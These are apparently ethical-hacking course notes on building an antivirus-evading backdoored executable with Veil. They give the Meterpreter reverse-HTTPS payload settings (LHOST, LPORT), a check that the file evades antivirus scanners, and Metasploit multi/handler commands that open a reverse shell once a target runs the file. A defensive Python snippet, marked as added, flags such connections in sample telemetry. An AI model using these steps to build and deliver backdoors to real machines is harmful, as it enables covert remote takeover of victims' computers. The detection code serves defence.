Ethical Hacking - GAINING ACCESS(17)
Date: July 10, 2023

CLIENT SIDE ATTACKS - Backdooring exe's

Download an executable file first.

VEIL - FRAMEWORK

A backdoor is a file that gives us full control over the machine that it gets executed on.

Backdoors can be caught by Anti-Virus programs.

Veil is a framework for generating undetectable backdoors.

1. Run veil

veil

Select tool 1 - Evasion.

2. List payloads and Select one

Veil/Evasion>: list

Veil-Evasion

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

[*] Available Payloads:

1)    autoit/shellcode_inject/flat.py

2)    auxiliary/coldwar_wrapper.py
3)    auxiliary/macro_converter.py
4)    auxiliary/pyinstaller_wrapper.py

5)    c/meterpreter/rev_http.py
6)    c/meterpreter/rev_http_service.py
7)    c/meterpreter/rev_tcp.py
8)    c/meterpreter/rev_tcp_service.py

9)    cs/meterpreter/rev_http.py
10)    cs/meterpreter/rev_https.py
11)    cs/meterpreter/rev_tcp.py
12)    cs/shellcode_inject/base64.py
13)    cs/shellcode_inject/virtual.py

14)    go/meterpreter/rev_http.py
15)    go/meterpreter/rev_https.py
16)    go/meterpreter/rev_tcp.py
17)    go/shellcode_inject/virtual.py

18)    lua/shellcode_inject/flat.py

19)    perl/shellcode_inject/flat.py

20)    powershell/meterpreter/rev_http.py
21)    powershell/meterpreter/rev_https.py
22)    powershell/meterpreter/rev_tcp.py
23)    powershell/shellcode_inject/psexec_virtual.py
24)    powershell/shellcode_inject/virtual.py

25)    python/meterpreter/bind_tcp.py
26)    python/meterpreter/rev_http.py
27)    python/meterpreter/rev_https.py
28)    python/meterpreter/rev_tcp.py
29)    python/shellcode_inject/aes_encrypt.py
30)    python/shellcode_inject/arc_encrypt.py
31)    python/shellcode_inject/base64_substitution.py
32)    python/shellcode_inject/des_encrypt.py
33)    python/shellcode_inject/flat.py
34)    python/shellcode_inject/letter_substitution.py
35)    python/shellcode_inject/pidinject.py
36)    python/shellcode_inject/stallion.py

37)    ruby/meterpreter/rev_http.py
38)    ruby/meterpreter/rev_https.py
39)    ruby/meterpreter/rev_tcp.py
40)    ruby/shellcode_inject/base64.py
41)    ruby/shellcode_inject/flat.py

3. Generating an undetectable backdoor using Veil 3

use go/meterpreter/rev_https.py

set LHOST 10.0.0.15
set LPORT 8080
set PROCESSORS 1
set SLEEP 6

4. Generate backdoor

generate

Scan the file through https://nodistribute.com/.

Run handler

1. Run Metasploit

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload

set PAYLOAD [veil payload]

4. Set IP

set LHOST [your IP]

5. Set port

set LPORT [veil port]

6. exploit

exploit

Run the backdoor file on the target machine successfully.
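
From the defender's side, the session set up above (an HTTPS connection from the executed file back to the handler on 10.0.0.15:8080) leaves endpoint and network traces. The following added example, not part of the original notes, triages connection telemetry for that pattern; the record fields, the threshold and all sample events are assumptions constructed for illustration.

```python
# Added example: defender-side triage of endpoint connection telemetry.
# Field names and all sample events are constructed for illustration.
from collections import defaultdict

TLS_PORTS = {443}  # assumption: the only port expected to carry TLS here
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")

EVENTS = [  # constructed sample data, not real telemetry
    {"host": "WS-01", "image": r"C:\Program Files\Browser\browser.exe",
     "signed": True, "dst": "198.51.100.10", "dport": 443, "tls": True},
    {"host": "WS-02", "image": r"C:\Users\alice\Downloads\setup.exe",
     "signed": False, "dst": "10.0.0.15", "dport": 8080, "tls": True},
    {"host": "WS-02", "image": r"C:\Users\alice\Downloads\setup.exe",
     "signed": False, "dst": "10.0.0.15", "dport": 8080, "tls": True},
    {"host": "WS-03", "image": r"C:\ProgramData\Vendor\updater.exe",
     "signed": True, "dst": "203.0.113.7", "dport": 443, "tls": True},
    {"host": "WS-04", "image": r"C:\Tools\proxy.exe",
     "signed": False, "dst": "10.0.0.20", "dport": 8080, "tls": False},
]

def reasons(event):
    """Return the independent indicators that apply to one connection."""
    found = []
    if not event["signed"]:
        found.append("unsigned image")
    if any(p in event["image"].lower() for p in USER_WRITABLE):
        found.append("runs from user-writable path")
    if event["tls"] and event["dport"] not in TLS_PORTS:
        found.append("TLS on non-standard port %d" % event["dport"])
    return found

def suspicious(events, threshold=2):
    """Group connections by (host, image, dst, dport); keep those with
    at least `threshold` indicators, plus a connection count."""
    hits = defaultdict(lambda: {"count": 0, "reasons": []})
    for e in events:
        r = reasons(e)
        if len(r) >= threshold:
            key = (e["host"], e["image"], e["dst"], e["dport"])
            hits[key]["count"] += 1
            hits[key]["reasons"] = r
    return dict(hits)

if __name__ == "__main__":
    for key, info in suspicious(EVENTS).items():
        print(key, info)
```

Requiring two or more indicators keeps a signed updater in ProgramData or an unsigned tool on plain HTTP from being flagged on a single weak signal.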
